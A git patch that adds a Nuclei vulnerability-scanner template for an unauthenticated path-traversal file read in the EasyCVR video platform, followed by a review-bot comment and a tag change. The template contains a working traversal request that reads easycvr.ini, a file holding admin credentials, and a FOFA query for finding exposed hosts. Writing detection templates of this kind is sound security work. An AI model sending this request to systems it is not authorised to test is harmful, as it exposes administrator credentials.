From 3f2816639d34671fb92142919437c633cce98ec5 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Mon, 16 Dec 2024 14:36:29 +0300
Subject: [PATCH 1/2] add easycvr-arbitrary-file-read
---
 .../other/easycvr-arbitrary-file-read.yaml | 46 +++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml
diff --git a/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml
new file mode 100644
index 00000000000..244102b5f4c
--- /dev/null
+++ b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml
@@ -0,0 +1,46 @@
+id: easycvr-arbitrary-file-read
+
+info:
+ name: EasyCVR Video Management - Arbitrary File Read
+ author: s4e-io
+ severity: high
+ description: |
+ The EasyCVR-video management platform taillog interface has an arbitrary file read vulnerability. Unauthenticated attackers can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., which puts the website in an extremely insecure state.
+ remediation: |
+ Ensure that the application does not allow directory traversal or access to sensitive files through web requests. Implement proper input validation and restrict access to critical files.
+ reference:
+ - https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486259&idx=1&sn=dd51ca8df3aa1533144b975b9bec3086
+ metadata:
+ verified: true
+ max-request: 2
+ fofa-query: icon_hash="458134656"
+ tags: easycvr,unauth,misconfig,arbitrary-file-read
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "EasyCVR")'
+ - "status_code == 200"
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains_all(body, "default_admin_user", "default_admin_password")'
+ - 'contains(content_type, "text/plain")'
+ - "status_code == 200"
+ condition: and
From f4af46f3d5c4642f1cd5cf42782f739720df587e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 17 Dec 2024 10:41:19 +0530
Subject: [PATCH 2/2] Update easycvr-arbitrary-file-read.yaml
---
 http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml
index 244102b5f4c..934b55491d5 100644
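Review bot: The traversal path in the second request (`GET /taillog/oxsecl/..\easycvr.ini`) uses a backslash separator, so this check presumably only confirms the issue on hosts that treat `\` as a path separator (likely Windows installs), and a non-match elsewhere does not show the host is unaffected; the `description` should state that limit. The same description lists "database configuration files" twice, and `info` carries no `classification:` block; I would add `cwe-id: CWE-22` there so findings can be triaged by weakness class. A wording such as `The EasyCVR taillog endpoint allows unauthenticated path traversal; this template confirms it by reading easycvr.ini through a Windows-style path.` would cover both. Matching on the key names only, with no extractor, is the right choice to keep, since the matched keys suggest the file holds admin credentials that should not end up in scan output.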
--- a/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml
+++ b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml
@@ -14,7 +14,7 @@ info:
 verified: true
 max-request: 2
 fofa-query: icon_hash="458134656"
- tags: easycvr,unauth,misconfig,arbitrary-file-read
+ tags: easycvr,unauth,lfi
 
 flow: http(1) && http(2)
 